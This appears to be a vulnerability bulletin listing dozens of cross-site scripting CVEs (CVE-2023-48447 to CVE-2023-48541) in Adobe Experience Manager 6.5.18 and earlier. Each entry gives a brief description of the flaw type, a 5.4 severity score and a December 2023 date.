adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48447
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48448
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48449
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48450
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48451
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48452
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48453
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48454
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48455
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48456
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48457
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48458
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48459
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48460
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48461
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48462
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48463
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48464
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48465
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48466
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48467
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48468
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48469
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48470
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48471
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48472
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48473
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48474
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48475
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48476
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48477
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48478
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48479
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48480
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48481
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48482
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48483
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48484
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48485
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48486
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48487
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48488
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48489
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48490
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48491
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48492
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48493
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48494
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48495
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48496
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48497
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48498
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48499
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48500
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48501
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48502
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48503
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48504
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48505
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48506
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48507
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48508
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48509
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48510
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48511
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48512
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48513
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48514
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48515
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48516
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48517
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48518
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48519
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48520
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48521
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48522
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48523
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48524
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48525
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48526
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48527
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48528
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48529
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48530
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48531
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48532
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48533
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48534
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48535
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48536
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48537
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48538
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48539
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48540
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48541
psirt@adobe.com
